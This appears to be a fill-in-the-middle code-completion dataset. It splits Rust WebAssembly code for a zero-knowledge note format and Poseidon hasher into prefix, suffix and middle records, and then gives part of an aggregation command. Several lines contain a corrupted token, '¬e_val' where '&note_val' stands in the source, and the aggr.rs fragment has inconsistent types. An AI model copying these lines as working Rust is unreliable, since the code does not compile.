if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(¬e_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(¬e_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn with_options(opts: PoseidonHasherOptions) -> Self {
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bind
|
{
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
|
conditional_block
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
impl fmt::Display for NoteVersion {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false => {
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(¬e_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(¬e_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn
|
(opts: PoseidonHasherOptions) -> Self {
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bindgen
|
with_options
|
identifier_name
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
impl fmt::Display for NoteVersion {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false => {
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(¬e_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(¬e_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn with_options(opts: PoseidonHasherOptions) -> Self
|
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bind
|
{
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
|
identifier_body
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
|
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false => {
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(¬e_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(¬e_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn with_options(opts: PoseidonHasherOptions) -> Self {
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bindgen
|
impl fmt::Display for NoteVersion {
|
random_line_split
|
aggr.rs
|
, argument_error, mandate, error};
use crate::lib::command_util::{find_field, find_field_from_str};
use crate::lang::printer::Printer;
use crossbeam::{Receiver, bounded, unbounded, Sender};
use crate::util::thread::{handle, build};
struct Aggregation {
idx: usize,
name: String,
command: Closure,
}
pub struct Config {
table_idx: usize,
aggregations: Vec<Aggregation>,
}
pub fn parse(input_type: &[ColumnType], argument: Vec<Argument>) -> CrushResult<Config> {
let mut table=None;
let mut aggregations = Vec::new();
let mut next_idx = input_type.len();
for a in &argument {
match (a.name.as_deref(), a.value) {
(Some("column"), Value::Field(name)) => {
table = Some(find_field(name.as_ref(), input_type)?);
}
(Some(name), Value::Closure(command)) => {
aggregations.push(
Aggregation {
command,
name: Box::from(name),
idx: find_field_from_str(name, input_type)
.unwrap_or_else(|| {next_idx += 1; next_idx - 1})
}
)
}
_ => return argument_error("Bad argument"),
}
}
Ok(Config {
table_idx: mandate(table, "Missing table spec")?,
aggregations,
})
/*
if argument.len() < 2 {
return Err(argument_error("Expected at least two paramaters"));
}
let (table_idx, aggregations) = match (argument.len() % 2, argument[0].name.is_none(), &argument[0].value) {
(0, false, _) => (guess_table(input_type)?, &argument[..]),
(1, true, Value::Field(f)) => (find_field(&f, input_type)?, &argument[1..]),
_ => return Err(argument_error("Could not find table to aggregate")),
};
match &input_type[table_idx].cell_type {
ValueType::Rows(sub_type) |
ValueType::Output(sub_type) => {
let output_definition = aggregations
.chunks(2)
.into_iter()
.map(|args| {
let spec = &args[0];
let clos = &args[1];
match (&spec.name, &spec.value, &clos.value) {
(Some(name), Value::Field(f), Value::Closure(c)) =>
Ok((
name.to_string(),
find_field(&f, sub_type)?,
c.clone()
)),
_ => Err(error("Invalid aggragation spec")),
}
})
.collect::<JobResult<Vec<(String, usize, Closure)>>>()?;
Ok(Config {
table_idx,
output_definition,
})
}
_ => {
Err(argument_error("No table to aggregate on found"))
}
}
*/
}
/*
pub fn guess_table(input_type: &[ColumnType]) -> JobResult<usize> {
let tables: Vec<usize> = input_type
.iter()
.enumerate()
.flat_map(|(idx, t)| {
match &t.cell_type {
ValueType::Output(_) | ValueType::Rows(_) => Some(idx),
_ => None,
}
}).collect();
if tables.len() == 1 {
Ok(tables[0])
} else {
Err(argument_error(format!("Could not guess tables to join, expected one table, found {}", tables.len()).as_str()))
}
}
*/
fn create_writer(
uninitialized_output: ValueSender,
mut output_names: Vec<Option<String>>,
writer_input: Receiver<Row>) ->
JobJoinHandle {
handle(build("aggr-writer".to_string()).spawn(
move || {
let output = match writer_input.recv() {
Ok(row) => {
let tmp = uninitialized_output.initialize(
row.cells
.iter()
.enumerate()
.map(|(idx, cell)| ColumnType { name: output_names[idx].take(), cell_type: cell.value_type() })
.collect()
)?;
tmp.send(row);
tmp
}
Err(_) => return Err(error("No output")),
};
loop {
match writer_input.recv() {
Ok(row) => {
output.send(row);
}
Err(_) => break,
}
}
Ok(())
}))
}
pub fn create_collector(
rest_input: InputStream,
uninitialized_inputs: Vec<ValueReceiver>,
writer_output: Sender<Row>) -> JobJoinHandle {
handle(build("aggr-collector".to_string()).spawn(
move || {
match rest_input.recv() {
Ok(mut partial_row) => {
for ui in uninitialized_inputs {
let i = ui.initialize_stream()?;
match i.recv() {
Ok(mut r) => {
partial_row.cells.push(std::mem::replace(&mut r.cells[0], Value::Integer(0)));
}
Err(_) => return Err(error("Missing value")),
}
}
writer_output.send(partial_row);
}
Err(_) => {}
}
Ok(())
}))
}
pub fn pump_table(
job_output: &mut impl Readable,
outputs: Vec<OutputStream>,
output_definition: &Vec<(String, usize, Closure)>) -> JobResult<()> {
let stream_to_column_mapping = output_definition.iter().map(|(_, off, _)| *off).collect::<Vec<usize>>();
loop {
match job_output.read() {
Ok(mut inner_row) => {
for stream_idx in 0..stream_to_column_mapping.len() {
outputs[stream_idx].send(Row { cells: vec![inner_row.cells.replace(stream_to_column_mapping[stream_idx], Value::Integer(0))] })?;
}
}
Err(_) => break,
}
}
Ok(())
}
fn create_aggregator(
name: &str,
idx: usize,
c: &Closure,
input_type: &[ColumnType],
uninitialized_inputs: &mut Vec<ValueReceiver>,
outputs: &mut Vec<OutputStream>,
env: &Env,
printer: &Printer) -> JobResult<JobJoinHandle> {
let (first_output, first_input) = streams(vec![
ColumnType::named(name, input_type[idx].value_type.clone())
]);
let (last_output, last_input) = streams();
outputs.push(first_output);
uninitialized_inputs.push(last_input);
let local_printer = printer.clone();
let local_env = env.clone();
let cc = c.clone();
Ok(handle(build("aggr-aggregator".to_string()).spawn(
move || {
cc.spawn_and_execute(CompileContext {
input: first_input,
output: last_output,
arguments: vec![],
env: local_env,
printer: local_printer,
});
Ok(())
})))
}
fn handle_row(
row: Row,
config: &Config,
job_output: &mut impl Readable,
printer: &Printer,
env: &Env,
input: &InputStream,
writer_output: &Sender<Row>) -> JobResult<()> {
let mut outputs: Vec<OutputStream> = Vec::new();
let mut uninitialized_inputs: Vec<ValueReceiver> = Vec::new();
let mut aggregator_handles: Vec<JobJoinHandle> = Vec::new();
let (uninit_rest_output, uninit_rest_input) = streams();
let mut rest_output_type = input.get_type().clone();
rest_output_type.remove(config.table_idx);
